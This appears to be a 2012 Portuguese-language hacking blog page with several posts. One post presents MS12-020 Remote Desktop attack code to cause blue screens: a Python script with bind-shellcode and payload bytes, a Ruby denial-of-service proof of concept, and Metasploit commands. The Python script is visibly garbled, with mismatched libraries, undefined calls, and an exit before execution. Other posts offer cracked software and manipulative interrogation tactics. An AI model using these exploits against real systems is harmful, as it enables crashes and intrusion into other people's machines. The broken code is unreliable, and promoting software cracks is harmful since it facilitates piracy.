Invasão no Windows 8 através do Java Signed Applet

Este vulnerabilidade permite ao invasor obter qualquer dado de um computador como Windows 8, pois através de engenharia social como induzir os usuários.

Detecção de Intrusos com SNORT - Back|Track 5R3

Sistema de detecção de intrusão , nada mais é do que uma ferramenta capaz de identificar tentativas de invasão em tempo real.

Hackeando e obtendo informações de dispositivos Android

Uma técnica de "hackear" os dispositivos moveis com o sistema operacional Android. Vamos utilizar a ferramente já conhecida por alguns, o Metasploit.

quinta-feira, 27 de dezembro de 2012

Quer ficar mais inteligente? Basta pensar em sexo



Um estudo realizado pela Universidade de Amsterdã, na Holanda, indica que pensar em sexo pode aumentar a capacidade de homens e mulheres em resolver problemas de lógica e matemática. Durante os testes realizados pelos pesquisadores, as pessoas que estavam com ideias “safadas” na cabeça obtiveram desempenhos maiores do que aquelas com pensamentos “puros”.

Segundo os cientistas, pensar em atividades sexuais ativa uma área do cérebro projetada para ajudar na reprodução humana. Isso faz com que prestemos mais atenção ao ambiente ao nosso redor, reparando mais nas pessoas e buscando sinais de interesse sexual enquanto flertamos com alguém.

Tais mudanças também intensificam nossa atenção e foco em detalhes, o que acaba favorecendo nossa capacidade de raciocínio. O estudo também sugere que, quando estamos apaixonados, aumentamos nossa tendência a pensar em objetivos a longo prazo e aprimoramos nossa capacidade criativa.

O que a pesquisa não explica é o porquê de grande parte dos adolescentes no ensino médio ter grandes dificuldades em resolver problemas de matérias como física e matemática — apesar de os membros da faixa etária pensarem constantemente em sexo.

FONTE : TecMundo

Blue Screen Of Death – RDP


O que ele faz ? Se o RDP ( Remote Desktop Protocol ) estiver habilitado na máquina remota para sessões não seguras ( a maior parte dos casos isso acontece ) você pode gerar a famosa “tela azul” !
Segue o script em algumas linguagens:

Python >>

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploi
#
#   Uses FreeRDP
#############################################################################

import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego

#bind shellcode TCP port 4444
shellcode  = ‘\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90′
shellcode += ‘\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9′
shellcode += ‘\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56′
shellcode += ‘\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22′
shellcode += ‘\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30′
shellcode += ‘\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81′
shellcode += ‘\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42′
shellcode += ‘\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22′
shellcode += ‘\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9′
shellcode += ‘\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79′
shellcode += ‘\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab’
shellcode += ‘\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa’
shellcode += ‘\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48′
shellcode += ‘\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1′
shellcode += ‘\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0′
shellcode += ‘\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe’
shellcode += ‘\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9′
shellcode += ‘\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84′
shellcode += ‘\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56′
shellcode += ‘\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8′
shellcode += ‘\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79′
shellcode += ‘\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6′
shellcode += ‘\xba\xb5\x60\x56\x39\x4a\xb6\xa9′

#Payload
payload  = ‘\x41\x00\x5c\x00′
payload += ‘\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49′
payload += ‘\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x68′
payload += ‘\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x32\x42\x41\x32′
payload += ‘\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x59\x49\x6c\x43′
payload += ‘\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x4f\x39\x6f\x71′
payload += ‘\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x65\x75\x6c\x4c’
payload += ‘\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x4b\x50\x4f\x74′
payload += ‘\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x39\x6c\x4b\x66′
payload += ‘\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x39\x4c\x6c\x4c’
payload += ‘\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x4d\x44\x41\x4b’
payload += ‘\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x48\x72\x55\x79′
payload += ‘\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x36\x4e\x6b\x54′
payload += ‘\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x6b\x77\x73\x36′
payload += ‘\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x61\x69\x53\x30′
payload += ‘\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x6b\x77\x30\x66′
payload += ‘\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x70\x64\x48\x73′
payload += ‘\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x70\x39\x6f\x6b’
payload += ‘\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63′
payload += ‘\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a’
payload += ‘\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f’
payload += ‘\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73′
payload += ‘\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c’
payload += ‘\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70′
payload += ‘\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61′
payload += ‘\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33′
payload += ‘\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32′
payload += ‘\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e’
payload += ‘\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39′
payload += ‘\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x49\x51\x47\x39′
payload += ‘\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x4f\x38\x50\x6e’
payload += ‘\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e’
payload += ‘\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51′
payload += ‘\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64′
payload += ‘\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37′
payload += ‘\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x4d\x6b\x4e\x70′
payload += ‘\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e’
payload += ‘\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73′
payload += ‘\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61′
payload += ‘\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78′
payload += ‘\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e’
payload += ‘\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30′
payload += ‘\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b’
payload += ‘\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b’
payload += ‘\x4f\x69\x46\x4b\x4f\x6e\x30\x68′;

class SRVSVC_Exploit(Thread):
def __init__(self, target, port=3389):
super(SRVSVC_Exploit, self).__init__()
self.__port   = port
self.target   = target

def __DCEPacket(self):
print ‘[-]Connecting’
self.__trans = rdp.transport.cert(‘rdp_np:%s\\x00\\x89]’ % self.target)
self.__trans.connect()
print ‘[-]connected’ % self.target

# Making teh packet
self.__stub=’\x01\x00\x00\x00′
self.__stub+=’\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00′
self.__stub+=shellcode
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x41\x41\x41\x41\x41\x41\x41\x41′
self.__stub+=’\x00\x00\x00\x00′
self.__stub+=’\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00′
self.__stub+=payload
self.__stub+=’\x00\x00\x00\x00′
self.__stub+=’\x02\x00\x00\x00\x02\x00\x00\x00′
self.__stub+=’\x00\x00\x00\x00\x02\x00\x00\x00′
self.__stub+=’\x5c\x00\x00\x00\x01\x00\x00\x00′
self.__stub+=’\x01\x00\x00\x00\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3′
return

def run(self):
self.__DCEPacket()
self.__dce.call(0x1f, self.__stub)
print ‘[-]Exploit successfull!…\nTelnet to port 4444 on target machine.’

if __name__ == ‘__main__’:
target = sys.argv[1]
print ‘\nUsage: %s \n’ % sys.argv[0]
sys.exit(-1)

current = SRVSVC_Exploit(target)
current.start()

RUBY >>

#!/usr/bin/ruby
# Exploit : RDP( Remote Desktop Protocol ) 0-day Exploit POC
# Author  : Zer0 Thunder

require ‘socket’
require ‘timeout’

$ser_header = “\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00″
$payload = “\x03\x00\x01\xd6\x02\xf0\x80\x7f\x65\x82\x01″ +
“\x94\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19″+
“\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x02″+
“\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01″+
“\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01″+
“\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x30\x19″+
“\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01″+
“\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01″+
“\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01″+
“\x02\x02\x04\x20\x02\x04\x00\x00\x00\x02\x30\x1c”+
“\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff”+
“\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00″+
“\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04″+
“\x00\x00\x00\x02\x04\x82\x01\x33\x00\x05\x00\x14″+
“\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0″+
“\x00\x44\x75\x63\x61\x81\x1c\x01\xc0\xd8\x00\x04″+
“\x00\x08\x00\x80\x02\xe0\x01\x01\xca\x03\xaa\x09″+
“\x04\x00\x00\xce\x0e\x00\x00\x48\x00\x4f\x00\x53″+
“\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c”

$cp =    ”\x01\xca\x01\x00\x00\x00\x00\x00\x10\x00\x07\x00″+
“\x01\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00″+
“\x2d\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00″+
“\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00″+
“\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x04\xc0\x0c\x00\x0d\x00\x00\x00\x00\x00\x00\x00″+
“\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00″+
“\x03\xc0\x2c\x00\x03\x00\x00\x00\x72\x64\x70\x64″+
“\x72\x00\x00\x00\x00\x00\x80\x80\x63\x6c\x69\x70″+
“\x72\x64\x72\x00\x00\x00\xa0\xc0\x72\x64\x70\x73″+
“\x6e\x64\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x08″+
“\x02\xf0\x80\x28″
$n =     ”\x00″ * 67

if ARGV[0] == nil
puts “—————————————-”
puts “RDP(Remote Desktop Protocol ) 0-day POC “
puts “exploit by Zer0 Thunder\n”
puts “useage : exploit.rb
exit()

else
rdport = 3389
puts “[+] Target : “+ARGV[0]

end

while true
begin
timeout(5) do
s = TCPSocket.new(ARGV[0],rdport,timeout=30)
s.send(($ser_header+$payload+$n+$cp),0)
res = s.recv(1024)
puts “\tPacket Sent – “
puts “\t #{res.unpack(“H*”)[0]} \n”
puts “\t #{s.read.unpack(“H*”)[0]}”
s.close
end
rescue Timeout::Error
puts “[+]Server Doesn’t Respond .”
end
end

METASPLOIT


use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

set RHOST IP

run

O artigo é um pouco vago para algumas pessoas leigos na areá de pentest, mas caso queira se aprofundar no básico , procure saber como copilar e executar cada linguagem descrita a cima.

FONTE : http://secdragons.wordpress.com/

terça-feira, 18 de dezembro de 2012

MakeMoney 2.0.9c + crack



O MakeMoney é a ferramenta ideal para testar uma ideia de produto, avaliar a viabilidade de uma inovação, planejar um novo empreendimento ou ajudar uma empresa existente a inovar, aumentar sua competitividade e acessar novos mercados. Elaborar um Plano de Negócio, um EVTEC (estudo de viabilidade) ou um Plano de Inovação se torna uma tarefa simples e rápida.

TAMANHO: 27 MB


Como usar:
  1. A instrução para instalação do crack está contida no arquivo de download.
  2. Para o programa funcionar no Windows 7 ou sistemas superiores, você deverá rodá-lo em modo compatibilidade com o windows 98.
  3. Use!

segunda-feira, 3 de dezembro de 2012

Baixar torrent pelo navegador

Volta e meia precisamos fazer download de algum torrent mas o computador que estamos não nos oferece um cliente torrent para tal tarefa. As vezes o problema é ainda pior, o sistema é bloqueado contra instalação de programas (requere senha administrativa). Ai você pensa: Executarei um cliente torrent portatil, mas após executá-lo recebe a mensagem do firewall do windows perguntando se deseja criar uma excessão para o programa poder se conectar à internet, mas novamente é requerido a senha de administrador. A solução?? Lhes apresento neste momento:


Este site permite que você baixe qualquer torrent, via navegador, uma mão na roda e tanto. Clara, ele não dispensa todas as funcionalidades de um cliente. 
Ele aceita links diretos que levem até o arquivo .torrent ou você poderá buscar em seu computador o arquivo. Somente não aceita Magnet link.

É necessário ter o java instalado e atualizado em seu computador para o funcionamento do mesmo. Bom Download!

Google entra na briga por uma internet livre

A luta por uma internet livre no mundo ganha um forte aliado, o Google colocou em sua página inicial uma mensagem aos que querem uma internet livre em todo o mundo, com um link mencionando algumas informações importantes, inclusive o abaixo assinado para todos aqueles que são contra uma internet controlada.


O link contém várias informações, como de que a reunião que decidirá o futuro da liberdade na internet está de porta fechadas, apenas os governos terão acesso a essa reunião, incluindo países que são contra a liberdade na internet e apelam deixando a frase abaixo:
“Um mundo livre e aberto depende de uma Internet livre e aberta. Os governos por si sós não podem determinar o futuro da Internet. Os bilhões de pessoas em todo o mundo que usam a Internet, bem como os especialistas que a desenvolvem e a mantêm, devem ser incluídos.”
Uma imagem deixada na página informa uma hashtag #freeandopen “Livre e Aberto”.

Veja mais informações clicando neste link, que dá acesso direto a página mencionada na pagina inicial do Google.

FONTE : www.anonymousbrasil.com

domingo, 2 de dezembro de 2012

Estaria a segurança do Linux ameaçada?


Nas últimas semanas, a comunidade Linux foi surpreendida por uma notícia “devastadora”: um rootkit recém descoberto estaria infectando sistemas Linux. Será que o mantra de que Linux é um sistema seguro teria ido por água abaixo?

Uma das características mais fortes do Linux em relação a outros sistemas, em especial ao Windows, é o forte e rígido sistema de segurança, além da estabilidade, é claro. Não bastou, porém, que a notícia de que um rootkit para o sistema teria sido descoberto para que comentaristas de blogs, de sites e de fóruns começassem a provocar a comunidade Linux com perguntas capciosas do tipo “onde está a segurança do Linux agora?”, fazendo quase que um convite subjetivo para que trocássemos nosso sistema pelo fracassado Windows 8.

É claro que quem faz esse tipo de comentário provavelmente nem chegou a ler a notícia por completo. O malware em questão, assim como os demais que existem para Linux – sim, este não será o primeiro e tampouco o último – ataca servidores Linux, neste caso, baseados em sistemas Debian e com o servidor web ngix.

Normalmente, um usuário doméstico de Linux não rodará sistemas de servidor em seu computador pessoal, assim, estamos imunes a esta praga. Mesmo que você seja infectado, porém, não há o que se preocupar, pois temos o rkhunter, que serve justamente para detectar e eliminar esse tipo de ameaça.
O que os triunfantes usuários de Windows se esquecem é que, uma vez que um servidor Debian seja infectado com esse malware, o programa malicioso vai inserir um iframe em todas as páginas hospedadas pelo servidor web e este, por sua vez, vai executar códigos maliciosos para infectar… o próprio Windows! Assim, embora alguns tenham dito que isso seria um sinal do aumento da popularidade do Linux, percebe-se que, no final das contas, o objetivo principal dos cibercriminosos é continuar infectando máquinas com o sistema da Microsoft.

É claro que nenhum sistema operacional está livre de problemas de segurança e, para evitá-los, a principal medida é mantê-lo sempre atualizado. Mas a pergunta que faço àqueles que estão perguntando onde está a segurança do Linux agora é: quantos malwares existem mesmo para Windows?

Fonte: http://espacoliberdade.blog.br/tecnologia/estaria-seguran%C3%A7a-do-linux-amea%C3%A7ada

terça-feira, 27 de novembro de 2012

Engenharia social [A Psicologia da Mentira]




Resumo (Torne-se um detector de mentiras humano Bem vocês devem está perguntando o porquê de um topico falando sobre psicologia da mentira , bem neste tópico vou mostrar-lhes como se prevenir e como detectar que estão aplicando em vocês uma Engenharia social (mentira,SEing,ES)...


"Quem tiver olhos para ver e ouvidos atentos pode convencer-se de que nenhum mortal
é capaz de manter segredo. Se os lábios estiverem silenciosos, a pessoa ficará
batendo os dedos na mesa e trairá a si mesma, suando por cada um dos seus poros!"
• Sigmund Freud


Sabemos que a honestidade é à base de qualquer relacionamento humano. Mas, muitas vezes, as pessoas deixam de ser honestas conosco. É de grande valor estar ciente das verdadeiras intenções de alguém, e isso vai lhe poupar tempo, dinheiro e energia.


O que você vai ler abaixo é baseado no resultado de anos de estudos na área do comportamento humano; principalmente do trabalho do Dr. David J. Lieberman - um renomado Ph.D. em Psicologia e Hipnoterapeuta - em seu livro: "Never be lied again", o qual me influenciou imensamente na produção deste material. Lembro que não são meramente técnicas para se descobrir a verdade, mas sim técnicas poderosas e eficazes, os quais são utilizadas mundialmente por entrevistadores e interrogadores experientes(ES criminalistica).

Chegou a hora de saber as reais intenções das pessoas e impedir que elas tirem vantagem de você! )

(Apresento-lhe os 30 sinais de uma mentira. O corpo nos revela a verdade.
Estudos demonstraram que numa apresentação diante de um grupo de pessoas, 55% do impacto são determinadas pela linguagem corporal - postura, gestos e contato visual -, 38% pelo tom de voz e apenas 7% pelo conteúdo da apresentação (Mehrabian e Ferris, "Inference of attitudes from noverbal communication in two channels", in The Journal of Counselling Psychology, vol. 31, 1967, pp. 248-52). Podemos concluir que não é o que dizemos, mas como dizemos, que faz a diferença. Sabendo disso, podemos usar a observação para nos ajudar a descobrir a verdade.

1. A pessoa fará pouco ou nenhum contato direto nos olhos;
2. A expressão física será limitada, com poucos movimentos dos braços e das mãos. Quando tais movimentos ocorrem, eles parecem rígidos e mecânicos. As mãos, os braços e as pernas tendem a ficar encolhidos contra o corpo e a pessoa ocupa menos espaço;
3. Uma ou ambas as mãos podem ser levadas ao rosto (a mão pode cobrir a boca, indicando que ela não acredita - ou está insegura - no que está dizendo). Também é improvável que a pessoa toque seu peito com um gesto de mão aberta;
4. A fim de parecer mais tranqüila, a pessoa poderá se encolher um pouco;
5. Não há sincronismo entre gestos e palavras;
6. A cabeça se move de modo mecânico;
7. Ocorre o movimento de distanciamento da pessoa para longe de seu acusador, possivelmente em direção à saída;
8. A pessoa que mente reluta em se defrontar com seu acusador e pode virar sua cabeça ou posicionar seu corpo para o lado oposto;
9. O corpo ficará encolhido. É improvável que permaneça ereto;
10. Haverá pouco ou nenhum contato físico por parte da pessoa durante a tentativa de convencê-lo;
11. A pessoa não apontará seu dedo para quem está tentando convencer;
12. Observe para onde os olhos da pessoa se movem na hora da resposta de sua pergunta. Se olhar para cima e à direita, e for destra, tem grandes chances de estar mentindo.
13. Observe o tempo de demora na resposta de sua pergunta. Uma demora na resposta indica que ela está criando a desculpa e em seguida verificando se esta é coerente ou não. A pessoa que mente não consegue responder automaticamente à sua pergunta.
14. A pessoa que mente adquire uma expressão corporal mais relaxada quando você muda de assunto.
15. Se a pessoa ficar tranqüila enquanto você a acusa, então é melhor desconfiar. Dificilmente as pessoas ficam tranqüilas enquanto são acusadas por algo que sabem que são inocentes. A tendência natural do ser humano é manter um certo desespero para provar que é inocente. Por outro lado, a pessoa que mente fica quieta, evitando a todo custo falar de mais detalhes sobre a acusação;
16. Quem mente utilizará as palavras de quem o ouve para afirmar seu ponto de vista;
17. A pessoa que mente continuará acrescentando informações até se certificar de que você se convenceu com o que ela disse;
18. Ela pode ficar de costas para a parede, dando a impressão que mentalmente está pronta para se defender;
19. Em relação à história contada, o mentiroso, geralmente, deixa de mencionar aspectos negativos;
20. Um mentiroso pode estar pronto para responder as suas perguntas, mas ele mesmo não coloca nenhuma questão.
21. A pessoa que mente pode utilizar as seguintes frases para ganhar tempo, a fim de pensar numa resposta (ou como forma de mudar de assunto): "Por que eu mentiria para você?", "Para dizer a verdade...", "Para ser franco...", "De onde você tirou essa idéia?", "Por que está me perguntando uma coisa dessas?", "Poderia repetir a pergunta?", "Eu acho que este não é um bom lugar para se discutir isso", "Podemos falar mais tarde a respeito disso?", "Como se atreve a me perguntar uma coisa dessas?";
22. Ela evita responder, pedindo para você repetir a pergunta, ou então responde com outra pergunta;
23. A pessoa utiliza de humor e sarcasmo para aliviar as preocupações do interlocutor;
24. A pessoa que está mentindo pode corar, transpirar e respirar com dificuldade;
25. O corpo da pessoa mentirosa pode ficar trêmulo: as mãos podem tremer. Se a pessoa estiver escondendo as mãos, isso pode ser uma tentativa de ocultar um tremor incontrolável.
26. Observe a voz. Ela pode falhar e a pessoa pode parecer incoerente;
27. Voz fora do tom: as cordas vocais, como qualquer outro músculo, tendem a ficar enrijecidos quando a pessoa está sob pressão. Isso produzirá um som mais alto.
28. Engolir em seco: a pessoa pode começar a engolir em seco.
29. Pigarrear: Se ela estiver mentindo têm grandes chances de pigarrear enquanto fala com você. Devido à ansiedade, o muco se forma na garganta, e uma pessoa que fala em público, se estiver nervosa, pode pigarrear para limpar a garganta antes de começar a falar.
30. Já reparou que quando estamos convictos do que estamos dizendo, nossas mãos e braços gesticulam, enfatizando nosso ponto de vista e demonstrando forte convicção? A pessoa que mente não consegue fazer isso. Esteja atento.

Armando-se para a batalha verbal e partindo para o ataque

Chegou a hora de usarmos um sofisticado e abrangente sistema de questionamentos que fará com que qualquer pessoa fale a verdade em apenas alguns minutos em qualquer conversa ou situação. Vou lhe armar com as melhores munições possíveis para que você vença rapidamente a batalha verbal e chegue até a verdade. Os resultados serão verdadeiramente surpreendentes.

Importante: Não esqueça de observar as respostas não-verbais (inconscientes) - os sinais que você acabou de aprender - após a sua pergunta.

1.Não acuse - Insinue: O objetivo é fazer uma pergunta que não represente nenhuma acusação, mas que insinue o possível comportamento da pessoa. Exemplo de uso:
Suspeita: Você acha que seu (a) namorado (a) foi infiel na noite passada.
Pergunta incorreta: "Você andou me traindo?"
Pergunta correta: "Aconteceu alguma coisa diferente na noite passada?"
Observe sua expressão corporal e alguma possível pista de preocupação e nervosismo com sua pergunta. Qualquer resposta do tipo: "Porque perguntou isso?" ou "Alguém te falou alguma coisa?", seguidas de um certo nervosismo, indicam forte preocupação por parte da pessoa. Ela não estaria preocupada em saber porque você está fazendo tal pergunta, a menos que pense que você pode estar sabendo o que ela não quer que você saiba.

2.Situação semelhante: Aqui você vai apresentar uma situação semelhante à que suspeita que esteja acontecendo. O bom é que vai poder falar sobre o assunto sem parecer acusatório. Exemplo de uso:
Suspeita: Você acha que seu (a) namorado (a) está lhe traindo.
Pergunta incorreta: "Você está me traindo com Fulana (o) de Tal?"
Pergunta correta: "Sabe, minha (meu) amiga (o) Fulana (o) de Tal me disse que está muito desconfiada (o) do (a) seu (sua) namorado (a). Ela (e) tem quase certeza que ele (a) está cometendo uma traição. Ele (a) fica muito estranho (a) e nervoso (a) quando ela (e) fala sobre histórias de traição. O que você acha disso?" Se a pessoa for culpada, ficará preocupada, constrangida ou embaraçada e vai querer rapidamente mudar de assunto. Porém, se a pessoa achar que sua pergunta é interessante e ela for inocente, poderá iniciar uma conversa a respeito da pergunta. Esta é uma forte indicação de inocência, porque ela não tem receio de discutir o tema e não está investigando por quê você faz a pergunta.

3.Não é surpreendente?: Como no exemplo acima, aqui você vai abordar o assunto, mas de uma forma geral. Nos permitirá uma grande percepção de culpa ou inocência da pessoa. Exemplo de uso:
Suspeita: Você desconfia que seu (sua) noivo (a) está saindo com outra (o)
Pergunta incorreta: "Você está saindo com outra (o)?"
Pergunta correta: "Olha que absurdo... Hoje minha (meu) amiga (o) Fulana (o) de Tal me contou que pegou seu (a) noivo (a) com outra (o). Não é impressionante como alguém consegue ser infiel e não ter receio de ser desmascarado?" Quaisquer respostas que demonstrem reações de embaraço, nervosismo ou constrangimento, seguidas de perguntas como: "Por que está me perguntado isso?", além de tentativas de mudança de assunto, demonstram grande carga de preocupação e culpa.

4.Atacando o ego da pessoa. Aqui vamos usar o ego da pessoa contra ela própria. Vamos dizer a ela que jamais seria capaz de confessar, pois está sendo 'pressionada' por outra pessoa à não dizer a verdade e que essa pessoa manda nela. Esta técnica é muito usada por policiais. Exemplo de uso:
Suspeita: Você tem quase certeza que Fulano (a) roubou sua empresa
Pergunta incorreta: "Vai confessar que roubou minha empresa, ou não?"
Pergunta correta: "Acho que já sei qual é o problema: Você não me diz a verdade porque alguém manda em você. Você não tem o poder para decidir isso. Tem outra pessoa por trás disso e você não quer 'ficar mal' com ela, não é?" O mais incrível é que geralmente as pessoas acabam confessando e se sentindo orgulhosas de ter feito isso.

5.Indução: Aqui está uma poderosa técnica. Particularmente, já utilizei e obtive ótimos resultados. Elabore uma pergunta que restrinja sua resposta a algo que a pessoa pense ser positivo, de forma que ela não se importe em responder sinceramente. Exemplo de uso:
Suspeita: Alguém viu seu (a) namorado (a) numa festa na noite passada.
Pergunta incorreta: "Você andou fazendo festa escondido de mim?"
Pergunta correta: "Ontem, você chegou em casa após as 24h, não foi?" Se a pessoa tiver ficado em casa, ficará livre para responder, mas se tiver, realmente saído, mesmo assim se sentirá a vontade em responder sinceramente, porque você deu a entender que já sabia e não havia problemas. O fato de a pessoa ter voltado para casa de madrugada não está em questão. O importante é que você conseguiu a resposta à verdadeira pergunta.

